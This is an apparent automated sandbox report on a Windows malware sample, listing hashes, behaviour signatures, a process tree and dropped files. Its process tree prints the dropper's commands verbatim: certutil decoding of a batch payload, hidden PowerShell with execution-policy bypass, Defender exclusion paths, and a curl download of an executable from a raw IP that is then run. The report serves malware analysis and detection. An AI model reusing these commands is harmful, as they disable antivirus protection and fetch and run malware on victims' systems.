Analysis

  • max time kernel
    62s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-03-2024 01:15

General

  • Target

    2771d19509020f26e66b8af84fd8b4af0e02ded04ba73bcb9b57987f7863975f.exe

  • Size

    157KB

  • MD5

    fdd319fa7de7f43c93afdff04162281d

  • SHA1

    6512ed74b9d7dc4d425f3652e39ff4691b09c5c8

  • SHA256

    2771d19509020f26e66b8af84fd8b4af0e02ded04ba73bcb9b57987f7863975f

  • SHA512

    b09231c91780d4b58226862d4a02a2f310b00375ed871efae6d761e97015ba412c9df9390efb3ef0f9fddcb912ab3c4032a1cda51fd7ee422324dab97e12777e

  • SSDEEP

    1536:gwcgVKD5XghB2jm/w7ecwOJhv9lMuEqTIm4gKN2PqAqMX3ciIAnoejei:vXVKlM7dOJCuTKNhAqimAN6

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2771d19509020f26e66b8af84fd8b4af0e02ded04ba73bcb9b57987f7863975f.exe
    "C:\Users\Admin\AppData\Local\Temp\2771d19509020f26e66b8af84fd8b4af0e02ded04ba73bcb9b57987f7863975f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2984
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\Music\Bless.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Windows\system32\cmd.exe
        cmd /c certutil -decode C:\Users\Public\Music/hillJesus.bat.b64 C:\Users\Public\Music/hillmary.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\system32\certutil.exe
          certutil -decode C:\Users\Public\Music/hillJesus.bat.b64 C:\Users\Public\Music/hillmary.bat
          4⤵
            PID:2724
        • C:\Windows\system32\timeout.exe
          timeout /t 1 /nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:2664
        • C:\Windows\system32\cmd.exe
          cmd /c C:\Users\Public\Music/hillmary.bat
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden -Exec Bypass start chrome https://get.adobe.com/
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" https://get.adobe.com/
              5⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef24d9758,0x7fef24d9768,0x7fef24d9778
                6⤵
                  PID:2456
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:2
                  6⤵
                    PID:1208
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:8
                    6⤵
                      PID:1536
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:8
                      6⤵
                        PID:1400
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:1
                        6⤵
                          PID:1064
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:1
                          6⤵
                            PID:1068
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1568 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:2
                            6⤵
                              PID:1748
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3176 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:1
                              6⤵
                                PID:2728
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3588 --field-trial-handle=1304,i,12687962374099360104,16137007617771302716,131072 /prefetch:8
                                6⤵
                                  PID:276
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -WindowStyle Hidden -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Public\Music
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1996
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -WindowStyle Hidden -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2284
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c curl.exe --output C:\Users\Public\Music/Adobe.exe --url http://51.222.194.213/0/GO.exe
                              4⤵
                                PID:2392
                              • C:\Windows\system32\timeout.exe
                                timeout /t 10 /nobreak
                                4⤵
                                • Delays execution with timeout.exe
                                PID:3016
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -WindowStyle Hidden -Exec Bypass C:\Users\Public\Music/Adobe.exe
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1928
                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                          1⤵
                            PID:2896

                          Network

                          MITRE ATT&CK Matrix ATT&CK v13

                          Discovery

                          System Information Discovery

                          2
                          T1082

                          Query Registry

                          1
                          T1012

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                            Filesize

                            68KB

                            MD5

                            29f65ba8e88c063813cc50a4ea544e93

                            SHA1

                            05a7040d5c127e68c25d81cc51271ffb8bef3568

                            SHA256

                            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

                            SHA512

                            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
                            Filesize

                            16B

                            MD5

                            aefd77f47fb84fae5ea194496b44c67a

                            SHA1

                            dcfbb6a5b8d05662c4858664f81693bb7f803b82

                            SHA256

                            4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                            SHA512

                            b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
                            Filesize

                            264KB

                            MD5

                            f50f89a0a91564d0b8a211f8921aa7de

                            SHA1

                            112403a17dd69d5b9018b8cede023cb3b54eab7d

                            SHA256

                            b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                            SHA512

                            bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                            Filesize

                            5KB

                            MD5

                            0399080d5c827df709eeb9e61ca84345

                            SHA1

                            6e4ef0200ddc3ced728363ba8b75b3787aeb282b

                            SHA256

                            7c5e0cbce11058ac1649b2b0cebde9408658ee192d00980e1569824178bada3f

                            SHA512

                            ee4fe45b69a73b6e40215dffd23d9341ce2eaf231121e7001bd6ffd75f481963e974999d17e4ae7b109da3d269b1800dcb06f76fc670e468a985e6b94995c076

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                            Filesize

                            5KB

                            MD5

                            f31388c3ea26ac855bfbb7466638a201

                            SHA1

                            a43410bd19722696c65acaaf7652152e7f57291b

                            SHA256

                            5b53e80da88501e65dea7405c3150cd873b07cb864b19757e35ce5fab402faff

                            SHA512

                            ab7cb0ac7b68faefbcf93024e0aed5648435ebc05242f24b8caef82f02bde12b68b67f967a2df25f3a934a13b2ae62920ef673235a1bf9b450bfb6a268df2e54

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
                            Filesize

                            16B

                            MD5

                            18e723571b00fb1694a3bad6c78e4054

                            SHA1

                            afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                            SHA256

                            8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                            SHA512

                            43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                          • C:\Users\Admin\AppData\Local\Temp\Tar1E03.tmp
                            Filesize

                            177KB

                            MD5

                            435a9ac180383f9fa094131b173a2f7b

                            SHA1

                            76944ea657a9db94f9a4bef38f88c46ed4166983

                            SHA256

                            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

                            SHA512

                            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                            Filesize

                            7KB

                            MD5

                            424e6fb569d336ba3d16cd14b827f650

                            SHA1

                            2120ec6fa3796c2aa1aa39fade7095c3b91c50cc

                            SHA256

                            bb5b133d96d50d98478f3e0402c0786647926442eb6f53308b394a2a028e0b11

                            SHA512

                            9872b528fb0250f425c17c4534cfd7402313968c78983f8a9781d0bb218ca13d170994737235f8702330a3ffc4e871eb2c8121320232716c1fe8952e680988dc

                          • C:\Users\Public\Music\Bless.bat
                            Filesize

                            3KB

                            MD5

                            4d8831ef5e7c5aa8a0faad4ce4cdab54

                            SHA1

                            14b88f36e3f786295af44b06ae69fdc75e72006b

                            SHA256

                            15e6bbc0c8d98df35b1ac2b88bed3f02dce6e745d7a9ac8afe6d43425f1bbdf4

                            SHA512

                            16aa0ef13234dfc0d318918b50fcda7b90ceec598ab9ba4a946c3cd37b3cb622379f31c2827683ffac0ab3114dbe64becb3b5fe56ae273c364a5b0fba9467ecf

                          • C:\Users\Public\Music\hillJesus.bat.b64
                            Filesize

                            2KB

                            MD5

                            59d54e845b45736cd4c88f5c14093482

                            SHA1

                            a54584e2619864ea3a5692250cd6d84ab16bd544

                            SHA256

                            5a37f3dd79f54644055484aeefb4046be8759611b990e00ad320ab2c1ed2c753

                            SHA512

                            4e69b4ad1c614c71c9fd4d82910649e3cb4685fdd5c23d2009f1dd39a2cf2a431b4b248e21114d706e13ff6971dbfc4ddc8a14fe6658c9066abe23756358269c

                          • C:\Users\Public\Music\hillmary.bat
                            Filesize

                            2KB

                            MD5

                            b2a0f5dbd16a1bb75bc8cd663f94b1be

                            SHA1

                            dde44d6dff0033eb7b1ca44324c805de51d1fecb

                            SHA256

                            f8ea78411b1be97efdbdc4c6b537b20b5c781e7a4cf8241d384536255fbf4764

                            SHA512

                            4f5ba3e1f1509eddede6aed15540297ba30b3c760ab6ae78f8b4e228851d2e14c14b12eab998b72f6c4bd2e7c0f329f342fc52ff22c6bec22f295502c1038e62

                          • \??\pipe\crashpad_2496_BALNHJRWAWREUZAD
                            MD5

                            d41d8cd98f00b204e9800998ecf8427e

                            SHA1

                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                            SHA256

                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                            SHA512

                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                          • memory/1928-189-0x0000000002C10000-0x0000000002C90000-memory.dmp
                            Filesize

                            512KB

                          • memory/1928-187-0x0000000002C10000-0x0000000002C90000-memory.dmp
                            Filesize

                            512KB

                          • memory/1928-190-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/1928-188-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/1928-186-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/1996-35-0x0000000001F50000-0x0000000001F58000-memory.dmp
                            Filesize

                            32KB

                          • memory/1996-39-0x0000000002C60000-0x0000000002CE0000-memory.dmp
                            Filesize

                            512KB

                          • memory/1996-40-0x0000000002C60000-0x0000000002CE0000-memory.dmp
                            Filesize

                            512KB

                          • memory/1996-38-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/1996-41-0x0000000002C60000-0x0000000002CE0000-memory.dmp
                            Filesize

                            512KB

                          • memory/1996-37-0x0000000002C60000-0x0000000002CE0000-memory.dmp
                            Filesize

                            512KB

                          • memory/1996-36-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/1996-80-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/1996-34-0x000000001B820000-0x000000001BB02000-memory.dmp
                            Filesize

                            2.9MB

                          • memory/2112-22-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/2112-20-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/2112-18-0x000000001B7D0000-0x000000001BAB2000-memory.dmp
                            Filesize

                            2.9MB

                          • memory/2112-19-0x0000000001E70000-0x0000000001E78000-memory.dmp
                            Filesize

                            32KB

                          • memory/2112-21-0x0000000002970000-0x00000000029F0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2112-24-0x0000000002970000-0x00000000029F0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2112-25-0x0000000002970000-0x00000000029F0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2112-23-0x0000000002970000-0x00000000029F0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2112-27-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/2284-88-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/2284-109-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/2284-89-0x0000000002E20000-0x0000000002EA0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2284-93-0x0000000002E20000-0x0000000002EA0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2284-90-0x0000000002E20000-0x0000000002EA0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2284-92-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
                            Filesize

                            9.6MB

                          • memory/2284-87-0x00000000020C0000-0x00000000020C8000-memory.dmp
                            Filesize

                            32KB

                          • memory/2284-91-0x0000000002E20000-0x0000000002EA0000-memory.dmp
                            Filesize

                            512KB

                          • memory/2984-8-0x0000000000400000-0x000000000042A000-memory.dmp
                            Filesize

                            168KB